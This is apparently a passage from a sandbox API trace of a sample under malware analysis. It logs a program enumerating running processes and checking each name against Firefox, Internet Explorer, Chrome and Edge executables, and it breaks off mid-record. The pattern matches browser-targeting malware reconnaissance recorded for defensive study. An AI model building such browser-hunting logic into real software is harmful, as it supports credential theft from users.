[0262.049] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0262.049] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.049] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0262.049] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0262.050] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0262.050] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0262.050] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.050] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.050] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.050] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.050] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.050] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.050] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.051] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.051] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.051] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.052] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.052] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.052] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.053] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0262.053] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0262.053] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0262.053] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.053] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.053] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.053] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.053] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.053] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.053] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.054] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.054] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.054] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.054] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.054] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.055] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0262.055] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0262.055] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0262.055] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.055] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.055] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0262.055] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0262.055] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0262.055] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.055] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0262.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0262.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0262.056] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.056] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.056] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.056] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.056] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.056] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.056] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0262.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0262.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0262.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0262.057] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0262.057] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0262.057] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0262.057] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0262.057] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.057] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0262.058] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0262.058] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0262.058] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0262.058] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.058] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0262.058] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0262.058] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0262.059] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0262.059] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.059] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0262.059] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0262.059] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0262.059] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0262.059] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.059] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0262.060] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0262.060] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0262.060] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0262.060] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0262.060] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0262.060] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0262.060] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0262.060] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.060] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0262.061] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0262.061] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0262.061] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0262.061] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0262.061] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0262.061] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0262.061] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0262.061] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.061] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0262.062] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0262.062] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0262.062] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0262.062] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.062] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0262.062] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0262.062] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0262.062] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0262.062] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0262.063] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0262.063] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0262.063] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0262.063] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.063] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0262.064] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0262.064] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0262.064] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0262.064] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0262.064] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0262.064] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0262.064] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0262.064] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.064] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0262.065] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0262.065] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0262.065] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0262.065] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0262.065] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0262.065] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0262.065] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0262.065] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0262.066] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0262.066] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0262.066] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0262.066] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.066] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0262.066] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0262.066] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0262.066] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0262.066] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.067] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0262.067] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0262.067] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0262.067] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0262.067] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.067] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0262.068] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0262.068] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0262.068] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0262.068] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.068] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0262.068] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0262.068] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0262.068] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0262.068] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.068] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0262.069] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0262.069] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0262.069] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0262.069] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.069] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.069] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0262.069] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0262.069] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0262.069] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.069] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.070] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.070] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.070] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.070] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.070] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0262.070] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0262.070] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0262.070] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0262.070] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.070] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.071] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0262.071] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0262.071] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0262.071] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.071] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0262.071] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0262.071] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0262.071] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0262.072] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.072] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 